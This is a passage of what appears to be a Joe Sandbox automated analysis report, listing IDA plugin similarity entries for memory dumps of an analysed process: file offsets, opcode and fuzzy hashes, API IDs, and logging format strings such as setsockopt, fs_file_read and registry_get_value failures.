                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: ErrorLastsetsockopt
                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                  • API String ID: 1729277954-3534120083
                  • Opcode ID: 6f2b0580ac5e605570fbaebc72f07140d3916ffc578ac77e8f5814e9907ee8f3
                  • Instruction ID: 5a29a860c574cdaccfa7e62a096f580d5dbb35840b9e4c6de897eab532d3ee32
                  • Opcode Fuzzy Hash: 6f2b0580ac5e605570fbaebc72f07140d3916ffc578ac77e8f5814e9907ee8f3
                  • Instruction Fuzzy Hash: 7BF09671B085478AF3505B6AB8005B66661AB887A4F108237EDED837B5DF7CD589C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: ErrorLastsetsockopt
                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                  • API String ID: 1729277954-3534120083
                  • Opcode ID: 1b536b85b17edd9e88145d2e943b27abcefec6fa7ca45e2336afdb1562b0314e
                  • Instruction ID: 042094c68beb3474147c7788146f97bbd06614ad46a626e4902452c998e4fdbf
                  • Opcode Fuzzy Hash: 1b536b85b17edd9e88145d2e943b27abcefec6fa7ca45e2336afdb1562b0314e
                  • Instruction Fuzzy Hash: B2F0F661A0895386F7105F9BAC006A76564BB84370F445271ED2D837B4DE3CE545C700
                  APIs
                  Strings
                  • ebus_dispatch, xrefs: 00007FFE1150180A
                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE11501811
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                  • API String ID: 3168844106-1717220914
                  • Opcode ID: 15deaf317dfdc4194d1a2c5d5cc6eeccf94406a9381b31fdac7c3786365024c8
                  • Instruction ID: b169f10dce7cad577dbdce311b9cd7aa3a0dfbfec96b5a4d590633705260a92f
                  • Opcode Fuzzy Hash: 15deaf317dfdc4194d1a2c5d5cc6eeccf94406a9381b31fdac7c3786365024c8
                  • Instruction Fuzzy Hash: 96214D32A09F8286EB618F66E88016C73A9FB44BA4F544179DE4D877B8DF3CE941C701
                  APIs
                  Strings
                  • ebus_dispatch, xrefs: 00007FFE0EB4EEEA
                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0EB4EEF1
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                  • API String ID: 3168844106-1717220914
                  • Opcode ID: 53611b293818d15e9ce415c90b29aeb7aea56c18796fbd7426b48b77701d6037
                  • Instruction ID: 1afcc7de5b9a81d86a42b0014893e3bfe4a033ec4e46f5a9b3cf3c1b9785655c
                  • Opcode Fuzzy Hash: 53611b293818d15e9ce415c90b29aeb7aea56c18796fbd7426b48b77701d6037
                  • Instruction Fuzzy Hash: BA21F972A18B8682EB709F15E840179A7A0FB84B98F144135DEDD8B778DF3CE891CB00
                  APIs
                  Strings
                  • ebus_dispatch, xrefs: 00007FFE0E16180A
                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0E161811
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                  • API String ID: 3168844106-1717220914
                  • Opcode ID: 0c0d9bdad17875df5bb4ef919751a230e7192319deab9599f5929f643f9db2cd
                  • Instruction ID: 1a072dc581b9dbf8eb64d4abab22adee32291fa74f6bed5571f0b81899f1d2e3
                  • Opcode Fuzzy Hash: 0c0d9bdad17875df5bb4ef919751a230e7192319deab9599f5929f643f9db2cd
                  • Instruction Fuzzy Hash: 27213B32A0AA8696EB609F25F84016967A4FB84B94B144136DEDD87A78DF3CE981C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: e20fdda9aecabaff660814530ca962a529c68a4245ba61236c39f773432a8f69
                  • Instruction ID: 4fbea147e4450deff69d3dd722b25b49b5c01f2accf3a922fce28d5a7f902fab
                  • Opcode Fuzzy Hash: e20fdda9aecabaff660814530ca962a529c68a4245ba61236c39f773432a8f69
                  • Instruction Fuzzy Hash: 2DF0BE23B08303C1FA63BA14B4403B891412F403A4EF905F9CE5C8B2C1AE3DA887D220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: c36b2bfec06eeb17a3fd2f8c90e0578e5cf6d39e4ee124647ec2c8155529b552
                  • Instruction ID: 2e12be60a329cb47a6c94904791ee4ab994cf2bdee69abc5170b3225ac8b80d7
                  • Opcode Fuzzy Hash: c36b2bfec06eeb17a3fd2f8c90e0578e5cf6d39e4ee124647ec2c8155529b552
                  • Instruction Fuzzy Hash: AFF0BE23B08303C1FA63BA14B4413B991412F403A8EF905F9CE588B2C1AE3DAC87D220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 99c49add896dd6c0c48605ffd0389eb332d1844b1e609faf413420c8f4f72ec4
                  • Instruction ID: 8cad9e5bbc1d6dcb9d59d2e611d4d5a9093abc3ad782cd87f7cebba186b4b2f2
                  • Opcode Fuzzy Hash: 99c49add896dd6c0c48605ffd0389eb332d1844b1e609faf413420c8f4f72ec4
                  • Instruction Fuzzy Hash: 20F0BE23B08303C5FA63BA14B4503B891412F403A8EF905F9CE588B2C1AE3DAC87D220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 48e6da06194066cba7cbd1fc689c3bc5121fe051459b6970667edbdb398a953f
                  • Instruction ID: 46078f73b1d35958df193122b7e6a965fb923a2ab19393a83d2d11e4d2cd7fe1
                  • Opcode Fuzzy Hash: 48e6da06194066cba7cbd1fc689c3bc5121fe051459b6970667edbdb398a953f
                  • Instruction Fuzzy Hash: 1DF0BE27B08303C1FA63BA04B4403B891012F403A8EF905F9CE588B2C1AE3DAC87C220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 478467ad4fcdb931f04fd95785b7c3ca6c6447a3d18e591636ae42fe8bd4d6e3
                  • Instruction ID: 8822b9713c619f2c3a26336ecd2139106f08d61354fc072cf0d03b5cb99d0a2a
                  • Opcode Fuzzy Hash: 478467ad4fcdb931f04fd95785b7c3ca6c6447a3d18e591636ae42fe8bd4d6e3
                  • Instruction Fuzzy Hash: D7F0BE27B08303C1FA63BA04B4413B991012F403A8EF905F9CE588B2C1AE3DAC87C220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: bab3fa4266bf6385715d8a845e4ec45dc94a11b3e1936ee208825299b3b21c26
                  • Instruction ID: c8f3f5668c6cd4f0d4d2cf8c8735d0435124c002965e53a0d8cacf77eb8e6dba
                  • Opcode Fuzzy Hash: bab3fa4266bf6385715d8a845e4ec45dc94a11b3e1936ee208825299b3b21c26
                  • Instruction Fuzzy Hash: C8F0BE27B08303C5FA63BA04B4503B891012F403A8EF905F9CE588B2C1AE3DAC87C220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 3d227f5c8d9164a1148a9a0b1eb26274599fa1a4243280d271cf8a8bfd2a681a
                  • Instruction ID: c0d52b9f819b009bda4879c663ef708a22df11703de63fa65cba97d145c3b066
                  • Opcode Fuzzy Hash: 3d227f5c8d9164a1148a9a0b1eb26274599fa1a4243280d271cf8a8bfd2a681a
                  • Instruction Fuzzy Hash: C9F0BE27B08303C1FA63BA04B4403B891012F403A8EF905F9CE588B2C1AE3DA887C220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 3d227f5c8d9164a1148a9a0b1eb26274599fa1a4243280d271cf8a8bfd2a681a
                  • Instruction ID: c0d52b9f819b009bda4879c663ef708a22df11703de63fa65cba97d145c3b066
                  • Opcode Fuzzy Hash: 3d227f5c8d9164a1148a9a0b1eb26274599fa1a4243280d271cf8a8bfd2a681a
                  • Instruction Fuzzy Hash: C9F0BE27B08303C1FA63BA04B4403B891012F403A8EF905F9CE588B2C1AE3DA887C220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 49eb97c33d4e33b4674ff0050d9134163984886c6adca0c109bbccc19d81c094
                  • Instruction ID: f1e25f974b0ed77a6e6ef67eb33d3cb1c71db238355699c7880cab1ed8648af5
                  • Opcode Fuzzy Hash: 49eb97c33d4e33b4674ff0050d9134163984886c6adca0c109bbccc19d81c094
                  • Instruction Fuzzy Hash: 00F0BE27B08303C1FA63BA04B4403B891012F403A8EF905FACE588B2C1AE3DAC87C220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 49eb97c33d4e33b4674ff0050d9134163984886c6adca0c109bbccc19d81c094
                  • Instruction ID: f1e25f974b0ed77a6e6ef67eb33d3cb1c71db238355699c7880cab1ed8648af5
                  • Opcode Fuzzy Hash: 49eb97c33d4e33b4674ff0050d9134163984886c6adca0c109bbccc19d81c094
                  • Instruction Fuzzy Hash: 00F0BE27B08303C1FA63BA04B4403B891012F403A8EF905FACE588B2C1AE3DAC87C220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 48e6da06194066cba7cbd1fc689c3bc5121fe051459b6970667edbdb398a953f
                  • Instruction ID: 46078f73b1d35958df193122b7e6a965fb923a2ab19393a83d2d11e4d2cd7fe1
                  • Opcode Fuzzy Hash: 48e6da06194066cba7cbd1fc689c3bc5121fe051459b6970667edbdb398a953f
                  • Instruction Fuzzy Hash: 1DF0BE27B08303C1FA63BA04B4403B891012F403A8EF905F9CE588B2C1AE3DAC87C220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 478467ad4fcdb931f04fd95785b7c3ca6c6447a3d18e591636ae42fe8bd4d6e3
                  • Instruction ID: 8822b9713c619f2c3a26336ecd2139106f08d61354fc072cf0d03b5cb99d0a2a
                  • Opcode Fuzzy Hash: 478467ad4fcdb931f04fd95785b7c3ca6c6447a3d18e591636ae42fe8bd4d6e3
                  • Instruction Fuzzy Hash: D7F0BE27B08303C1FA63BA04B4413B991012F403A8EF905F9CE588B2C1AE3DAC87C220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: bab3fa4266bf6385715d8a845e4ec45dc94a11b3e1936ee208825299b3b21c26
                  • Instruction ID: c8f3f5668c6cd4f0d4d2cf8c8735d0435124c002965e53a0d8cacf77eb8e6dba
                  • Opcode Fuzzy Hash: bab3fa4266bf6385715d8a845e4ec45dc94a11b3e1936ee208825299b3b21c26
                  • Instruction Fuzzy Hash: C8F0BE27B08303C5FA63BA04B4503B891012F403A8EF905F9CE588B2C1AE3DAC87C220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: 300d62241b88fd89afd79c4ffcb8bf13f2729a93e3e46433130e31516d88ba23
                  • Instruction ID: 4cb6875edd502ad02ea69aa5f4794496563893d4cc6f6ae655003d8eac2e2fc3
                  • Opcode Fuzzy Hash: 300d62241b88fd89afd79c4ffcb8bf13f2729a93e3e46433130e31516d88ba23
                  • Instruction Fuzzy Hash: 98F09662A08706C6F553BF00B880379A258EF417E4FE841BAED5DC6691DF3CDD8A9310
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
